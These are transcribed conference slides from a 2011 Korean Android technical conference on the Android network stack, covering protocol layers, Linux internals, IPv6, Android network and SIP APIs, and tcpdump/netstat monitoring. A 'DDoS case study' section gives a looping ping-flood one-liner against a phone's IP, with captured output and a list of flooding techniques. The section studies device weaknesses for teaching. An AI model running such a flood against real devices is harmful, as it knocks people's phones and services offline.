android network stack and enhancement (3g/ wifi , ipv4/ipv6, sip/voip)

Android Network Stack and Enhancement(3G/WiFi, IPV4/IPV6, SIP/VoIP)

Mar-11-2011 (Fri)

Geunsik Lim (Nick: 인베인 ) leemgs.at.gmail.comblog.naver.com/invain

본 문서는 비상업적 용도에 한해서 자유롭게 수정 및 재배포 가능하며 , 자료출처를 명시해야만 합니다 .

www.kandroid.org

CONTENTS

1. Computer Network2. Understanding Linux Network Internals3. Network Terminology (3G/WiFi, IPV4/IPV6, SIP/VoIP)4. Differences Between IPv4 and IPv6 5. Network Information Management on Android Phone 6. Traffic Monitoring using tcpdump/netstat (including DNS Resolver)7. Android Phone Attack using structural vulnerability8. Connections between Network Instruments and Android Platform9. References10.Conclusion11.Appendix: Network Scheduler for QoS, Network App for Study

Android Network Technology Session

3/387th Korea Android Technical Conference (www.kandroid.org)

What is Computer Network?

A computer network, often simply referred to as a network, is a collection of computers and devices interconnected by communications channels that facilitate communications among users and allows users to share resources. A computer network allows sharing of resources and information among interconnected devices.

* Source: wikipedia


Overlay Network

IP Layer

SONET/SDH Layer

Optical Layer

Site Layer

An overlay network is a virtual computer network that is built on top of another network. Nodes in the overlay are connected by virtual or logical links, each of which corresponds to a path, perhaps through many physical links, in the underlying network.

For example, many peer-to-peer networks are overlay networks because they are organized as nodes of a virtual system of links run on top of the Internet. The Internet was initially built as an overlay on the telephone network .


Overview of Network Stack

TCP/IP Models (4Layer)

Application (SIP, HTTP, FTP, DNS, DHCP, IMAP, SMTP, SSH, XMPP, RTP, RTSP, H323)

Transport (TCP/UDP)

Internetwork (IPv4,IPv6, ICMP, IGMP, ARP)

Link Layer or Host-to-network (Ethernet,Token Ring)

Message

Segment

Datagram/Packet

Frame

7

6

5

4

3

2

1

4

3

2

1

The OSI model remains an important reference point for networking discussions even though it never took off for a variety of reasons. The TCP/IP model covers most of the protocols used by computers today.

ApplicationNetwork Process to

ApplicationPresentation

Data Representation & EncryptionSession

Internet Communication

TransportEnd-to-End Connections a&

Reliability

NetworkPath Determination & Logical

Addressing(IP)

PhysicalMedia, Signal and Binary

Transmission

data

data

data

frames

bits

packets

Data linkPhysical Addressing (MAC &

LLC)

segments

Data unit Layers

Host LayersM

edia Layers

OSI Model (7Layer)Data unit Layers


As we have seen, each layer provides a variety of protocols. Each protocol is handled by a different set of kernel functions. Thus, as the packet travels back up the stack, each protocol must figure out which protocol is being used by the next-higher layer, and invoke the proper kernel function to handle the packet.

Headers compiled by layers: (a...d) on Host X as we travel down the stack; on Router RT X .

/web/site1.htmlSrc port=5000Dst port=80

Src IP=100.100.100.100Dst IP=101.101.101.011Transport Protocol=TCP

Src IP=00:20:e1:77:00:02Dst IP=00:21:e6:32:00:01Internet Protocol


Src IP=100.100.100.100Dst IP=101.101.101.011Transport Protocol=TCP


/web/site1.html

Link Layer Payload

Network Layer Payload

Transport Layer Payload

Link Layer Header

Network Header

Transport Header

Message

A

B

C

D

Understanding Linux Network Internals Combination of each layer by kernel functions


Understanding Linux Network Internals Android Linux Networking Architecture

Application Layer(INET)

Berkeley Socket Interface

Protocol Layer

Network Device Driver Interface/ queuing Discipline

Physical Device Driver

Physical Device and Media

User space

Kernel space

PF_INET PF_INET

Device Drivers Link

BSD Socket Interface

PF_INET

PINGTELNETtftptcpdump

PF_PACKET

dev_queue_xmit

Neighboring

UDP TCP . . . . .

L4

L3(ptype_base)

IPV4 ARP

…Network

Transport

ApplicationUser space

Kernel space


Understanding Linux Network Internals /proc files used by the IPv4 routing subsystem

error_bursterror_costflushgc_elasticitygc_intervalgc_min_interval_msgc_threshgc_timeoutmin_delaymax_delaymax_sizemin_adv_mssmin_pmtumtu_expiresredirect_loadredirect_numberredirect_silencesecret_interval

accept_redirectsaccept_source_routeforwardingmc_forwardingrp_filtersecure_redirectssend_redirectslog_martians

/

proc

sys

net

Ipv4/v6

confroute

net

all default

wlan0 lo rmnet0

ip_forwardicmp_echo_ignore_boradcasts

routert_acctrt_cacheip_mr_cacheip_mr_vif

statrt_cache

inet_init

inetdev_init

ip_rt_initip_mr_initfib_proc_init

devinet_init


The device driver stores in the net_device structure the time its most recent frame was received, and netif_rx stores the time the frame was received in the buffer itself. The local CPU ID is needed to retrieve the data structure associated with that CPU in a per-CPU vector, such as the following code in netif_rx: queue = &_ _get_cpu_var(softnet_data);

Understanding Linux Network Internals CPU's ingress queues

rmnet0 rmnet1 Rmnet n

DMADone

RxComplete

. . . . . .

CPU 1CPU 0

softnet_data

softnet_data

inpu

t_pk

t_qu

eue co

mpl

etio

n_qu

eue

net_

dev_

max

_bac

klo

g(3

00)

inpu

t_pk

t_qu

eue co

mpl

etio

n_qu

eue . . . . . . . . . . . .


• 3G: 3 세대 이동통신 기술 ( 아날로그 셀룰러폰이 1 세대 , 디지털 PCS 가 2 세대이다 .) 을 위한 ITU 규격이다 . 3G 는 장치가 정지해 있거나 또는 걷는 정도의 속도로 움직일 때에는 최고 384 Kbps 까지 , 그리고 차에서는 128 Kbps, 그리고 고정 장착되어 있는 경우에는 2Mbps 까지 전송 속도를 높일 수 있다 .

• Wi-Fi: 무선 이더넷 호환성 협회 즉 , WECA 에서 802.11b 무선 이더넷 표준에 대해 제공하고 있는 로고이다 . 호환성을 가진 PC 카드 및 컴퓨터는 Wi-Fi 로고를 사용할 수 있다 . WECA 의 임무는 Wi-Fi 제품의 상호 운용성을 보증하고 , Wi-Fi 가 전 세계의 무선랜 표준이 되도록 추진하는데 있다 . (/system/etc/apns-conf.xml )

• IPv4(Internet Protocol version 4): Internet Protocol 4 번째 판이며 , 전 세계적으로 사용된 첫 번째 인터넷 프로토콜이다 . IETF RFC 791(1981 년 9 월 ) 에 기술되어 있다 . IPv4 는 패킷 교환 네트워크 상에서 데이터를 교환하기 위한 프로토콜이다 .

• IPv6(Internet Protocol version 6): Internet Protocol 스택 중 네트워크 계층의 프로토콜로써 version 6 Internet Protocol 로 제정된 차세대 인터넷 프로토콜 을 말한다 . IPv6 와 기존 IPv4 사이의 가장 큰 차이점은 바로 IP 주소의 길이가 128 비트로 늘어 났다는 점이다 .

• VoIP (Voice over IP): IP 를 사용하여 음성정보를 전달하는 일련의 설비들을 위한 IP 전화기술이다 . 기존 IP 네트웍을 그대로 활용해 전화서비스를 통합 구현함으로써 전화 사용자들이 시내전화 요금만으로 인터넷 , 인트라넷 환경에서 시외 및 국제전화 서비스를 받을 수 있음 . (H.323, SIP, RTP, SDP, IMS, MGCP)

• SIP(Session Initiation Protocol): IETF 에서 정의한 시그널링 프로토콜로 음성과 화상 통화 같은 멀티미디어 세션을 제어하기 위해 널리 사용되며 , 하나 이상의 참가자들이 함께 세션을 만들고 , 수정하고 종료할 수 있게 한다 . (2002 년 7 월 RFC 3261 표준 )

3G/WiFi, IPV4/IPV6, SIP/VoIP


Differences Between IPv4 and IPv6 1/2The IPv4 address space is 2^32, or 4,294,967,296, possible addresses

(a little over 4 billion). In contrast, the IPv6 address space is 2^128,or 340,282,366,920,938,463,463,374,607,431,768,211,456 (3.4 × 10^38) possibleaddresses.

IPv6 Internet

IPv4

Internet

IPv6host

IPv6host

Native IPv6Native IPv6

6to4Server/relay

6to4Server/relay

6to4 tunnel

6to4 tunnel6to4 router

6to4 router

IPv6 island IPv6 island

Native IPv6

6to4

tunn

el

http://www.google.com/imgres?imgurl=http://image.aladin.co.kr/Community/mypaper/pimg_767960114231307.jpg&imgrefurl=http://blog.aladin.co.kr/sairay/934858&h=500&w=500&sz=15&tbnid=RXi1bDktSu-C1M:&tbnh=130&tbnw=130&prev=/images?q=%EC%BB%B4%ED%93%A8%ED%84%B0&zoom=1&q=%EC%BB%B4%ED%93%A8%ED%84%B0&usg=__7SjEpW_TkHCEu77rHcMq5eQG6MU=&sa=X&ei=B9VrTYKdHI_CccaEkI4M&ved=0CE4Q9QEwAg

http://www.google.com/imgres?imgurl=http://image.aladin.co.kr/Community/mypaper/pimg_767960114231307.jpg&imgrefurl=http://blog.aladin.co.kr/sairay/934858&h=500&w=500&sz=15&tbnid=RXi1bDktSu-C1M:&tbnh=130&tbnw=130&prev=/images?q=%EC%BB%B4%ED%93%A8%ED%84%B0&zoom=1&q=%EC%BB%B4%ED%93%A8%ED%84%B0&usg=__7SjEpW_TkHCEu77rHcMq5eQG6MU=&sa=X&ei=B9VrTYKdHI_CccaEkI4M&ved=0CE4Q9QEwAg


Differences Between IPv4 and IPv6 2/2

40 Octets

20 Octets

Destination Address

Source Address

Payload Length Next Header

HopLimit

Flow LabelVersion Traffic Class

Options PaddingDestination AddressSource Address

Time to Live Protocol Header ChecksumIdentification Flags Fragment

Offset

Total LengthVersion

IHL Type of Service

Field’s name kept from IPv4 to Ipv6Field not kept in IPv6Name and position changed in IPv6New field in IPv6

Payload Upper Layer

Hop by Hop Main header IN H/W Engine

Out

Process theHop-by-Hop EH CPU

Router

Network Scheduler

LEGEND

* IHL: internet header length * Details: RFC3697


Android Manifest.{permission | permission_group} for Network

Type Name DescriptionString ACCESS_NETWORK_STATE Allows applications to access information about networksString ACCESS_WIFI_STATE Allows applications to access information about Wi-Fi net-

worksString CHANGE_NETWORK_STATE Allows applications to change network connectivity state

String CHANGE_WIFI_MULTICAST_STATE

Allows applications to enter Wi-Fi Multicast mode

String CHANGE_WIFI_STATE Allows applications to change Wi-Fi connectivity state

String INTERNET Allows applications to open network sockets.

String USE_SIP Allows an application to use SIP service

String RECORD_AUDIO Allows an application to record audio* Source:

http://developer.android.com/reference/android/Manifest.permission.html

Android Manifest.permission_group for NetworkType Name Description

String NETWORK Used for permissions that provide access to network-ing services.

Android Manifest.permission for Network


How to Get Network Information ( 1/3)

• Collect network information with Connectiovity Manager (android.net.ConnectivityManager)

• Permission - manifest.xml<uses-permission android:name=“android.permission.ACCESS_NETWORK_STATE” /><uses-permission android:name=“android.permission.ACCESS_WIFI_STATE” /><uses-permission android:name=“android.permission.CHANGE_WIFI_STATE” />

• Method to get Network Info

public int getNetworkInfo() {int result = 3;ConnectivityManager connectivityManager;NetworkInfo networkInfo;connectivityManager = (ConnectivityManager)

this.getSystemService(Context.CONNECTIVITY_SERVICE);networkInfo = connectivityManager.getActiveNetworkInfo();if (networkInfo == null) {

result = 2;} else {

if (networkInfo.getType() == 0) result = 0; // 3G MOBILE else result = 1; // WIFI NETWORK

}return result;

}

http://developer.android.com/reference/android/net/ConnectivityManager.html


How to Get Network Information ( 2/3) • Method to get WiFi Information

public void getWifiInfo() {WifiManager wifimanager;wifimanager = (WifiManager) getSystemService(Context.WIFI_SERVICE);

WifiInfo info = wifimanager.getConnectionInfo();

String ssid = info.getSSID();tvWifi.setText("SSID : " + ssid );

currwifi = "SSID : " + ssid;if (!currwifi.equals(prevwifi)){

strwifi = strwifi + "SSID : " + ssid + "\n";prevwifi = currwifi;

}tvWifi.setText(strwifi);

}

* WiFiManager wifi = (WifiManager) getSystemService(WIFI_SERVICE); * DhcpInfo info = wifi.getDhcpInfo();

* SSID: Service Set IDentifier


How to Get Network Information ( 3/3)

• Method to get SIP/VoIP Information according to SipManager (on Gingerbread)

public static SipManager newInstance(Context context) {return (isApiSupported(context) ? new SipManager(context) : null);}private SipManager(Context context) {mContext = context;createSipService();}private void createSipService() {IBinder b = ServiceManager.getService(Context.SIP_SERVICE);mSipService = ISipService.Stub.asInterface(b);

Permission - manifest.xml<uses-permission android:name=“android.permission.USE_SIP” /><uses-permission android:name=“android.permission.RECORD_AUDIO” /><uses-permission android:name=“android.permission.MODIFY_AUDIO_SETTING” />

public SipAudioCall makeAudioCall (SipProfile localProfile, SipProfile peerProfile,SipAudioCall.Listener listener, int timeout) throwsSipException {SipAudioCall call = new SipAudioCall(mContext, localProfile);call.setListener(listener);SipSession s = createSipSession(localProfile, null);…call.makeCall(peerProfile, s, timeout);return call;}

* SipAudioCall

* SipManagerCreation


*#*#4636#*#* for general settings like GSM/CDMA- IMEI (International Mobile Equipment Identity)- Phone number (if known)- Current network- Ping test- Signal strength- Location (signal latency & Cell ID)- Neighboring Cell IDs- Roaming state- GSM service status- GPRS service status- Current network type- Message waiting status- Call redirect status- Call status

*#*#8255#*#* for Gtalk service monitor- Google Talk host address & port- Your Google JID (presumably Jabber ID, as GTalk is based on Jabber IRC)- Your Device ID (presumably hashed from something)- GTalk connection status- GTalk heartbeat status

Hidden Secret Code

IMEI


protocol size sockets mem-ory press maxhdr slab module cl co di ac

HIDP 344 0 -1 NI 0 no kernel n n n nBNEP 344 0 -1 NI 0 no kernel n n n n

RFCOMM 352 0 -1 NI 0 no kernel n n n nSCO 352 0 -1 NI 0 no kernel n n n n

L2CAP 560 0 -1 NI 0 no kernel n n n nKEY 360 0 -1 NI 0 no kernel n n n n

PACKET 392 0 -1 NI 0 no kernel n n n nRAWv6 616 0 -1 NI 0 yes kernel y y y n

UDPLITEv6 600 0 -1 NI 0 yes kernel y y y nUDPv6 600 0 0 NI 0 yes kernel y y y nTCPv6 1,184 4 5 no 292 yes kernel y y y y

PPPOPNS 416 0 -1 NI 0 no kernel n n n nPPPOLAC 416 0 -1 NI 0 no kernel n n n nPPPOL2TP 416 0 -1 NI 0 no kernel n n n n

PPPOE 416 0 -1 NI 0 no kernel n n n nUNIX 368 59 -1 NI 0 yes kernel n n n n

UDP-Lite 472 0 -1 NI 0 yes kernel y y y nRAW 456 0 -1 NI 0 yes kernel y y y nUDP 472 2 0 NI 0 yes kernel y y y nTCP 1,056 0 5 no 292 yes kernel y y y yHCI 368 0 -1 NI 0 no kernel n n n n

NETLINK 384 8 -1 NI 0 no kernel n n n n

Network Protocols for Android

* RAW protocol: This protocol is one of the common computer languages that documents are translated into and then sent to a networked printer. The printer interprets the protocol and prints the document.


Traffic Monitoring using tcpdump 1/2Cross Compiling tcpdump source on Linux DistributionGet the latest source for libpcap and tcpdump from http://www.tcpdump.org

1. Compile libpcap sourcerhel6$> tar zxvf libpcap-1.1.1.tar.gzrhel6$> cd libpcap-1.1.1/rhel6$> CC=arm-kandroid-gcc ac_cv_linux_vers=2 ./configure --host=arm-linux --with-pcap=linuxrhel6$> make

2. Compile tcpdump sourcerhel6$> cd ..rhel6$> tar zxvf tcpdump-4.1.1.tar.gzrhel6$> cd tcpdump-4.1.1/rhel6$> CC=arm-kandroid-gcc ac_cv_linux_vers=2 ./configure --host=arm-linux --with-pcap=linuxrhel6$> vi ./Makefile a. remove the -O2 flag and add the -static flag to the linker (LD_FLAGS += -static) b. If you get the following error: undefined reference to `__isoc99_sscanf‘ , add #define _GNU_SOURCE in the faulty .c files.rhel6$> make


Traffic Monitoring using tcpdump 2/23. Copy to the android-rootfs based on NFSrhel6$> sudo cp tcpdump /opt/android-rootfs/

4. Run tcpdump rhel6#us> sudo ./adb devices ???????????? no permissions rhel6#us> sudo ./adb kill-server rhel6#us> sudo ./adb shell android#> cd /data/local android#> chmod 777 tcpdump-arm android#> ./tcpdump-arm -i rmnet0 not port 23 (ignoring telnet traffic on port 23)


Android market - Search – Download “Shark for Root (native)” software

Tcpdump source in Android Official Repository

#> vi ./mydroid-froyo/.repo/manifest.xml<project path="external/tcpdump" name="android/platform/external/tcpdump" />

./out/target/product/harmony/obj/EXECUTABLES/tcpdump_intermediates/tcpdump

./out/target/product/harmony/obj/EXECUTABLES/tcpdump_intermediates/LINKED/tcpdump./out/target/product/harmony/symbols/system/bin/tcpdump./out/target/product/harmony/system/xbin/tcpdump

http://android.git.kernel.org/platform/external/tcpdump.git

Git Repository

manifest

Binary Files

Android App


rhel6$> adb shell tcpdump -i any -p -s 0 -w /sdcard/data.pcap

... do whatever you want to capture, then “Ctrl+C” to stop it ...

rhel6$> adb pull /sdcard/data.pcap .rhel6$> sudo yum install wireshark # or ethereal, if you're still old versionrhel6$> wireshark ./capture.pcap # or ethereal

... look at your packets and be wise ...

Network Monitoring with wireshark on Host PC 1/3

Option Description

-i any listen on any network interface-p disable promiscuous mode (doesn't work anyway)

-s 0 capture the entire packet-w write packets to a file (rather than printing to stdout)


Utilize Shark for Root / Shark Reader software locally on Android Phone.



* Active UNIX domain sockets (servers and established)Proto RefCnt Flags Type State I-Node PID/Program name Pathunix 2 [ ACC ] STREAM LISTENING 966 1328/qmuxd /data/radio/qmux_connect_socketunix 2 [ ACC ] STREAM LISTENING 194631 26528/com.kt.iwlan /data/data/com.kt.iwlan/sock_kafunix 2 [ ] DGRAM 1194 1341/lgospd /data/misc/lgosp/ipc_diagunix 2 [ ] DGRAM 446966 19994/com.kt.wifisv /data/misc/wifi/kaf/kafif_svrunix 2 [ ] DGRAM 427196 19052/com.lge.osp /data/misc/lgosp/ipc_usbctrlunix 2 [ ] DGRAM 427197 19052/com.lge.osp /data/misc/lgosp/ipc_usbdataunix 2 [ ] DGRAM 1199 1341/lgospd /data/misc/lgosp/ipc_fs_accessunix 2 [ ] DGRAM 427199 19052/com.lge.osp /data/misc/lgosp/ipc_gr * * * * * Middle Omission * * * * * unix 2 [ ] STREAM 194614 23815/app_process unix 3 [ ] STREAM CONNECTED 13410 5792/adbd unix 3 [ ] STREAM CONNECTED 13409 5792/adbd unix 3 [ ] STREAM CONNECTED 2300 1330/rild /dev/socket/rildunix 3 [ ] STREAM CONNECTED 2299 1536/com.android.ph unix 3 [ ] STREAM CONNECTED 2014 1331/zygote /dev/socket/zygoteunix 3 [ ] STREAM CONNECTED 2013 1435/system_server unix 3 [ ] STREAM CONNECTED 1227 1329/lgesystemd /dev/socket/lgesystemdunix 3 [ ] STREAM CONNECTED 1994 1435/system_server unix 3 [ ] STREAM CONNECTED 1926 1325/vold /dev/socket/voldunix 3 [ ] STREAM CONNECTED 1925 1435/system_server unix 3 [ ] STREAM CONNECTED 1915 1326/netd /dev/socket/netdunix 3 [ ] STREAM CONNECTED 1914 1435/system_server unix 3 [ ] STREAM CONNECTED 1900 1336/dbus-daemon /dev/socket/dbusunix 3 [ ] STREAM CONNECTED 1899 1435/system_server unix 3 [ ] STREAM CONNECTED 1165 1338/installd /dev/socket/installdunix 3 [ ] STREAM CONNECTED 1400 1435/system_server unix 2 [ ] DGRAM 1367 1435/system_server unix 3 [ ] STREAM CONNECTED 1261 1328/qmuxd /data/radio/qmux_connect_socketunix 3 [ ] STREAM CONNECTED 1229 1336/dbus-daemon unix 3 [ ] STREAM CONNECTED 1228 1336/dbus-daemon unix 2 [ ] DGRAM 1200 1341/lgospd unix 2 [ ] DGRAM 1196 1341/lgospd unix 2 [ ] DGRAM 1195 1341/lgospd unix 3 [ ] STREAM CONNECTED 924 1/init unix 3 [ ] STREAM CONNECTED 923 1/init

Unix Socket Connection Information


Network Monitoring with netstat command 1/2

/sys/class/net/<rmnet0>/address/sys/class/net/<rmnet0>/statistics/{rx|tx}_packets

/proc/net/dev

RMNet slow, broken data but reliable connectionPPP(point-to-point proto-col)

fast, high speed data but somewhat unstable connection

RMNET(Mobile network interface in Linux kernel-speak) is what Google use for Android to connect to the internet to transmit the message to the MMSC server . The interface names "rmnet0”correspond respectively to EDGE/3G and Wi-Fi.

http://freshmeat.net/projects/net-tools/ http://code.google.com/p/android-group-korea/downloads/list


Network Monitoring with netstat command 2/2

cat /proc/devicescat /proc/meminfocat /proc/mountscat /proc/net/arpcat /proc/net/if_inet6cat /proc/net/ipv6_routecat /proc/net/routecat /proc/net/wirelesscat /proc/versiondf -ahgetprop dalvik.vm.execution-modegetprop dalvik.vm.heapsizegetprop gsm.version.basebandgetprop ro.build.fingerprintgetprop ro.product.versiongetprop ro.sf.lcd_densityifconfig -aip -f inet6 addrip -f inet6 route showip addrip route showlsmodnetcfgnetstat -apnWnetstat -rpnWpsroute -A inet6 -nroute -nuname -a

Under the Hood of App Inventor for Androidhttp://aschillings.co.uk/html/under_the_hood.html


DNS Resolver (RFC 3484 ) 2/2* RFC 3484 - http://tools.ietf.org/html/rfc3484 * ANDROID-RFC3484 - "RFC 3484 support for Android", 2010, Bionic uses a NetBSD-derived resolver library which has been modified in the following ways:

1. don't implement the name-server-switch feature (a.k.a. <nsswitch.h>)

2. read /system/etc/resolv.conf instead of /etc/resolv.conf ( ./bionic/libc/netbsd/net/getaddrinfo.c)

3. read the list of servers from system properties(getprop/setprop). the code looks for 'net.dns1', 'net.dns2', etc.. Each property should contain the IP address of a DNS server. These properties are set/modified by other parts of the Android system (e.g. the dhcpd daemon). The implementation also supports per-process DNS server list, using the properties 'net.dns1.<pid>', 'net.dns2.<pid>', etc... Where <pid> stands for the numerical ID of the current process.

4. when performing a query, use a properly randomized Query ID (instead of a incremented one), for increased security.

5. when performing a query, bind the local client socket to a random port for increased security.

6. get rid of *many* unfortunate thread-safety issues in the original code* Sources: Android Official

Repository

http://tools.ietf.org/


DNS Resolver (RFC 3484 ) 2/2# getprop[ro.secure]: [1][ro.allow.mock.location]: [0][ro.debuggable]: [0][persist.service.adb.enable]: [1][ro.factorytest]: [0]

. . . . . Middle Omission . . . . . .

[net.dns1]: [8.8.8.8][net.dns2]: [8.8.4.4][gsm.current.phone-type]: [1][gsm.operator.numeric]: [22110][gsm.operator.alpha]: [Kandroid Broadband IT][gsm.operator.iso-country]: [it][gsm.operator.isroaming]: [false][gsm.version.baseband]: [11.23.35.13H_3.35.03.20][EXTERNAL_STORAGE_STATE]: [mounted][gsm.network.type]: [UMTS][gsm.data.network.type]: [UMTS][gsm.sim.change]: [false][gsm.cb.max.channel]: [15]


PORT STATE SERVICE21/tcp filtered ftp22/tcp filtered ssh23/tcp filtered telnet79/tcp filtered finger80/tcp filtered http135/tcp filtered msrpc137/tcp filtered netbios-ns138/tcp filtered netbios-dgm139/tcp filtered netbios-ssn445/tcp filtered microsoft-ds707/tcp filtered unknown903/tcp filtered iss-console-mgr1025/tcp filtered NFS-or-IIS1433/tcp filtered ms-sql-s1521/tcp filtered oracle3306/tcp filtered mysql3389/tcp filtered ms-term-serv4444/tcp filtered krb5245000/tcp filtered UPnP5900/tcp filtered vnc6101/tcp filtered VeritasBackupExec6667/tcp filtered irc8080/tcp filtered http-proxy17300/tcp filtered kuang2

KRNIC /APNIC.[ ISP Organization Information ]Org Name : Korea Android Freetel Corp.Service Name 7THWINGOrg Address : seoul-city kandroid-dongOrg Detail Address: 306

[ ISP IPv4 Admin Contact Information ]Name : HONG, GILDONGPhone : +82-2-7127-1473E-Mail : [email protected]

[ ISP IPv4 Tech Contact Information ]Name : HONG, GILDONGPhone : +82-2-7127-147E-mail : [email protected]

[ ISP Network Abuse Contact Information ]Name : YANG, DEOLPOOLPhone : +82-2-210-9765E-mail : [email protected]

Case Study: Android Phone Attack with DDoS 1/2

PING-based Distributed Denial of Service (DDoS) attacks

while true; do ping -l 100000 -s 10 -f 49.56.xx.xx & ; sleep 2; done &

05:26:14.396126 IP 211.100.100.100 > 49.56.20.158: ICMP echo request, id 51001, seq 45, length 6405:26:14.396281 IP 49.56.20.158 > 211.100.100.100: ICMP echo reply, id 51001, seq 45, length 6405:26:15.406084 IP 211.100.100.100 > 49.56.20.158: ICMP echo request, id 51001, seq 46, length 6405:26:15.406349 IP 49.56.20.158 > 211.100.100.100: ICMP echo reply, id 51001, seq 46, length 6405:26:16.396119 IP 211.100.100.100 > 49.56.20.158: ICMP echo request, id 51001, seq 47, length 64 . . . . . . . . . . . . . . .

# for CPU Load 100% 49.56.XXX.XXX

(rmnet0)

rcvbuf is not enough to hold preload OOM

http://www.youtube.com/watch?v=kQwXJfQmoSkDemo:

http://www.youtube.com/watch?v=kQwXJfQmoSk

http://www.whois.net/


DDoS Attacks (Distributed Denial-of-Service Attack): 분산되어 있는 다수의 시스템들이 하나의 표적 시스템을 공격하여 DoS [e.g :crash, halt, freeze] 를 발생시키는 공격기법

1. Buffer OverFlow(BOF) Attack: 컴퓨터의 한정된 메모리 공간과 처리속도 문제를 이용한 OverFlow 공격 기법

2. SYN Flooding: Three-Way Hand Shaking 연결에서 표적시스템의 응답에 침묵을 하는 방법

3. UDP Flooding: 공격자가 서비스를 수신할 IP 주소를 표적 시스템의 IP 주소로 변경하여 Traffic 과부하 방법

4. Smurf Attack : 공격자가 Src IP 주소를 표적시스템의 IP 주소로 바꾸어 ICMP Echo broadcast 하여 Traffic 과부하 발생시키는 방법

5. Teardrop Attack: 눈물방울공격으로 불리며 , 대량의 패킷을 아주 작은 조각으로 분리하여 전송하여 수신측에서 패킷을 재조립하는 과정에서 패킷 순서정보에 대한 결합 로드를 주어 시스템 다운 공격 방법 (http://www.ietf.org/rfc/rfc3128.txt)

Case Study: Android Phone Attack with DDoS 2/2


Connections between Network and Android Network Instruments-based Android Diagram

WiFi package (android.net.wifi)

VPN Package (android.net.vpn)

SIP Package(android.net.sip)

SIP Stack(NIST-SIP)

RTP Package(android.net.rtp)

JNIRTP(C++)

Telephony.SIP Package(com.android.internal.telephony.sip)

System/Functional Libraries

Application Framework

Application Phone APK SIP

(Setting/Receiver/Caller)

Dialer

Phone App

Network Audio/Video

bionic

(framework/base/voip/java/android/net)

external/nist-sip/*

/com/android/phone/sip

(arpa/inet)

Setting(WiFi/VPN)

/com/android/settings/


Connections between Network and Android SIP Architecture

PSTN

SoftPhone User

SIP Phone

Phone

Phone

RADIUS Server (FreeRADIUS)

Directory(OpenLDAP)

SIP proxy/registrar

IPBXPBX

(private branch exchange)

SIP-PSTN Gateway

Access router

kandroid’s

network

internet


SIP Proxy

LAN

IP PBX

IP PhoneIP Phone

IP Phone

IP Phone

IP Phone

SignalingVoice Stream

Connections between Network and Android SIP Connection Flow

SIP/SDP INVITE

SIP/SDP INVITE

SIP ACKSIP ACK

SIP: BYESIP: BYE

Status: 200OKStatus: 200OK

RTP/RTSP Stream

Status: 200OKStatus: 200OK

Status: 100 Trying

Status: 183 Session Progress

Status: 183 Session Progress

SIP Phone A

SIP Phone B


Connections between Network and Android Session and Audio Control

SIP Manager

SIP AUDIO Call

SIP Session

Simple Session Description

Audio Stream(RTP Stream Inheritance)

Audio Group

Audio Codecandroid.net.sipandroid.net.rtp

Audiocontrol

SDP SIP Session Management

SIP Object Creation & Call API

Service

SipService

SipSessionGroup

SipHelper

SipStackSipSessionSipAudioCa

ll

SimpleSessionDescriptioin

SipBroadCaseReceiver

SipPhoneFactory

SipPhone

SipCall

SipConnection

SipAudioCallListener

action_sip_add_profile

SIP Manage

r

PhoneFactory

RTP

• http://developer.android.com/resources/samples/SipDemo/index.html

Creating a SIP Manager

Making an Audio Call

Receiving Calls

Classes and Interfaces

Registering with a SIP Server

•Initiating SIP sessions.•Initiating and receiving calls.•Registering and unregistering with a SIP provider.•Verifying session connectivity.


Conclusion1. Many peer-to-peer networks are overlay networks because they are organized

as nodes of a virtual system of links run on top of the Internet.

2. The device driver stores in the ‘net_device’ structure the time its most recent frame was received, and ‘netif_rx’ stores the time the frame was received in the buffer itself.

3. We can manipulate to understand a lot of packets among the android mobile phone with tcpdump / wireshark. Utilize Shark for Root / Shark Reader software locally on Android Phone.

4. RMNET is what Google use for Android to connect to the internet to transmit the message.

5. Bionic uses a NetBSD-derived resolver(RFC3484) library which has been modified for mobile platform.

6. Android 2.3(API level 9) Provides access to Session Initiation Protocol (SIP) functionality, such as making and answering VOIP calls using SIP. To control how Android Market filters your application from devices that do not support SIP, remember to add the following to the application's manifest. <uses-feature android:name="android.hardware.sip.voip" />

RMNet slow, broken data but reliable connectionPPP(point-to-point proto-col)

fast , high speed data but somewhat unstable connec-tion


• How to reduce Google mail content ?Actually Google mail client of android phone read too many network packet ( e.g: imap header, imap body, images, linked contents) To reduce the contents of packet ASAP for good network traffic, We have to consider lighet-weight mail client directly with only imap header ).

• Whenever we find new wireless network address(APN) because of movement of the users, Why do we always repeat load/unload sequence of wireless kernel module for WiFi?

Think best behavior of kernel functions for effective battery saving and performance improvement.

• Our phone acquired too many network protocols, For example, We don't need unnecessary network protocol like RAW.

• Do we always wait for the connection completion of WiFi over 5seconds at New street? We have to find improved approach for the fast connection with tiny DNS resolver and Weighted based APN sorting

Think Time for Healthy Network Traffic


1. TCP/IP Illustrated Book - Volume 1: The Protocols, Addison-Wesley, 1994.- Volume 2: The Implementation, Addison-Wesley, 1995.- Volume 3: TCP for Transactions, HTTP, NNTP, and the UNIX Domain Protocols, Addison-Wesley, 1996.

2. UNIX Network Programming Book- Volume 1, Second Edition: Networking APIs: Sockets and XTI, Prentice Hall, 1998.- Volume 2, Second Edition: Interprocess Communications, Prentice Hall, 1999

3. Android Developers Google Groups , http://groups.google.com/group/android-developers

4. D. Andersen, H. Balakrishnan, M. Kaashoek, and R. Morris. Resilient Overlay Networks. In Proc. ACM SOSP, Oct. 2001.

5. "Basic Components of a Local Area Network (LAN)". NetworkBits.net. Retrieved 2008-04-08.

6. Android Developer Document , http://developer.android.com- android.net http://developer.android.com/reference/android/net/package-summary.html- android.net.sip http://developer.android.com/reference/android/net/sip/package-summary.html- android.net.wifi http://developer.android.com/reference/android/net/wifi/package-summary.html- SIP Demo http://developer.android.com/resources/samples/SipDemo/index.html

7. Understanding Linux Network Internals. Author: Christian Benvenuti. Publisher: O'Reilly.

8. XDA Forums, http://forum.xda-developers.com/

References


THANKS

Any Questions?


Appendix: The WRR network scheduler for Linux WRR(Weighted Round Robin) is a network scheduling module for Linux written by Christian Worm Mortensen. It has the ability to shape an internet connection without buying some expensive QoS solution from the ISP. It can even run on the firewall; thus making more efficient use of the firewall machine.

WRR worked on 2.4 kernels from 2.4.17 and newer and on most (if not all) 2.6 kernels until 2.6.28. If you need similar traffic shaping for 2.6.29 or later, consider using DRR (Deficit Round Robin) which has similar (but not identical) functionality. I have not yet myself switched to DRR so I will not (currently) provide any guidelines.

☞ 080820 releaseThis release is for 2.6.27 (tested). It will not work for older kernels. If you need support for older kernels, please use an older release below. It contains no new features but contains a one-line fix for an API change in 2.6.27. Please do not try 2.6.28 unless you are brave as it seems to have compatibility issues.

